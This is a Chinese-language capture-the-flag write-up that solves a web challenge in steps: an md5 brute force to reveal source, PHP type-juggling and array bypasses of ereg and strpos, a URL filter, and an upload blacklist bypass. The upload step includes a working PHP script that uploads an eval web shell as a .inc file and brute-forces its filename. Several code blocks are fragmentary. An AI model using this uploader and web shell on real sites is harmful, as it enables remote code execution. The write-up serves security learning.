• A+

# 0x00 前言

http://4e79618700b44607c.jie.sangebaimao.com

# 0x01 獲取源碼

#!php
substr(md5(\$_GET['source']),3,6)=="81a427"

#!python
#!/bin/env python
#-*- encoding: utf-8 -*-

import md5

def mx(str):
m1 = md5.new()
m1.update(str)
return m1.hexdigest()

if __name__ == '__main__':
m = '81a427'
for x in range(1,100000000):
a = mx(str(x))[3:9]
if a == m:
print x
break

/index.php?source=47733

## 0x02 登陸的腦洞

#!php
}

#!php
(0 == "str")=>true
(0 === "str")=>false

# 0x03 二次驗證

#!php
if (isset(\$_POST['salt']))
{
if (ereg("^[a-zA-Z0-9]+\$", \$_POST['salt']) === FALSE)
{
exit('ereg');
}
elseif (strlen(\$_POST['salt']) < 11 && \$_POST['salt'] > 999999999)
{
if (strpos(\$_POST['salt'], '*SGBM*') !== FALSE)
{
}

ereg處理數組會得到NULL,

array() > int可以得到true,

strpos處理數組也會得到NULL

salt[]=v&submit=1

bypass ereg函数了，查到了用%00

# 0x04 PATHINFO模式

#!php
\$URL = \$_SERVER['REQUEST_URI'];
\$matches = array();
preg_match('/^([a-z\/.]+)\$/', \$URL, \$matches);
if(strpos(\$URL, './') !== FALSE){
exit('./');
}
else if(strpos(\$URL, '\\') !== FALSE){
exit('\\');
}
else if(empty(\$matches) || \$matches[1] != \$URL){
exit('empty(\$matches) || \$matches[1] != \$URL');
}
else if(strpos(\$URL, '//') !== FALSE){
exit('//');
}
else if(substr(\$URL, -10) !== '/index.php'){
exit('substr(\$URL, -10) !== \'/index.php\'');
}
else if(strpos(\$URL, 'p.') !== FALSE){
exit('p.');
}
}
else {
\$_SESSION['power'] = 1;
}
}

LN牛的提示：

# 0x05 上傳之fuzz後綴

#!php
if(\$_FILES["file"]['size'] > 0 && \$_FILES["file"]['size'] < 102400) {
\$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
\$blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];//总有一款适合你
\$filearr = pathinfo(\$_FILES["file"]["name"]);
if(!in_array(\$_FILES["file"]['type'], \$typeAccepted)) {
exit("type error");
}
if(in_array(\$filearr["extension"], \$blackext)) {
exit("extension error");
}
\$filename = md5(time().rand(10, 99)) . "." . \$filearr["extension"];
\$destination_folder .= date('Y', time()) . "/" . date('m', time()) . "/";
\$file_name_path = \$destination_folder.\$filename;
if (!file_exists(\$destination_folder)) mkdir('./' . \$destination_folder, 0777, true);
} else {
}
}

#!php
<?php
\$phar = new Phar('virink.phar', 0, 'virink.phar');
\$phar->buildFromDirectory(dirname(__FILE__) . '/virink');
\$phar->setStub(\$phar->createDefaultStub('virink.php', 'virink.php'));
\$phar->compressFiles(Phar::GZ);
?>

#!php
Extract_Phar::go(true);
\$mimes = array(
'phps' => 2,
...，
'xsd' => 'text/plain',
'php' => 1,
'inc' => 1,
'avi' => 'video/avi',
...

#!php
<?php
date_default_timezone_set('UTC');
error_reporting(0);
function fuck(\$ext, \$contents){
\$u = "4e79618700b44607c.jie.sangebaimao.com";
\$key = "file\";filename=shell.\$ext\r\nContent-Type:image/jpeg\r\nv:v";
\$fields[\$key] = \$contents;
\$ch = curl_init();
curl_setopt(\$ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt(\$ch,CURLOPT_POST,true);
curl_setopt(\$ch,CURLOPT_POSTFIELDS,\$fields);
curl_setopt(\$ch,CURLOPT_BINARYTRANSFER,true);
\$result = curl_exec(\$ch);
curl_close(\$ch);
\$tt = substr(\$result,strpos(\$result,'Date')+11,20);
\$t = strtotime(\$tt);
if(strpos(\$result,'success') === FALSE)
die('error');
for(\$i = 10; \$i<100;\$i++){
\$f = file_get_contents(\$url);
if (\$f && strpos(\$f,'virink') !== FALSE){
print \$url;
break;
}
}
}
\$contents =<<<TEXT
<?php eval(\\$_POST[999]);?>virink
TEXT;
\$ext = 'inc';
fuck(\$ext, \$contents);
?>

## 0x06 什麼鬼？Misc

getshell之後果真很蛋疼，很奔溃！

imstudy(214329772) 1:44:30

#!python
#!/bin/env python
#-*- encoding: utf-8 -*-
# __author__ : Virink

from PIL import Image
import math

if __name__ == '__main__':
j = int(math.sqrt(count))
i = j+2
for k in range(0,i/4):
sx = i-k
sy = j+k
if (sx * sy) == count:
break
c = Image.new("RGB",(sx,sy))
file = open('flag.txt')
for x in range(0,sx):
for y in range(0,sy):